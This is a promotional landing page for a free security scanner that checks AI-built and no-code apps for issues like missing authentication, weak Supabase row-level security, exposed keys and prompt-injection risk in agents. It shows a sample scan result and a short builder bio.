Scan projects built with Lovable, Replit, Bolt, Cursor, Claude Code, Supabase, n8n, Make, Zapier, and more.
No signup. No credit card. Just an email.
$ scan ./my-lovable-app
↳ app + agent signals evaluated
↳ missing_authentication: CRITICAL
↳ weak_supabase_rls: HIGH
↳ exposed_api_keys: HIGH
↳ prompt_injection: MEDIUM
↳ missing_human_approval: HIGH
score: 82 / 100 · level: CRITICAL
$ recommendation: Hold launch. Apply top-5 urgent fixes.
What it is, what it does, what it touches. Takes about 60 seconds.
Deterministic scoring across app and agent risk signals. Top 3 risks and quick fixes shown immediately.
Severity per category, prompt-injection hardening, safer system-prompt rewrite, top-5 fixes, launch recommendation.
App risks
The mistakes we keep finding in vibe-coded apps before they ship.
Sensitive pages and APIs reachable without login.
Row-level security disabled or written incorrectly.
Anon role granted read or write on user tables.
Service-role / private keys shipped to the browser.
Admin gated client-side only — APIs left open.
Unverified webhooks flip 'paid' for free.
Login, signup, and AI endpoints open to abuse.
Logs and error pages spill PII or tokens.
Agent risks
Aligned with the OWASP Top 10 for LLM Applications.
Hidden instructions in docs, web pages, or user input.
Write, send, and external-trigger tools used unintendedly.
OAuth scopes far beyond the agent's task.
High-impact actions execute autonomously.
Webhooks and side-effects fired without validation.
Retrieved chunks or uploaded files hijack behavior.
Built by an engineer
Application & cloud security background. Former Principal Security Consultant at Trustwave and former Sr Security Engineer at AWS. Dozens of assessments shipped across industries — that experience is encoded in this scanner.
Free, deterministic, and ready in less than a minute.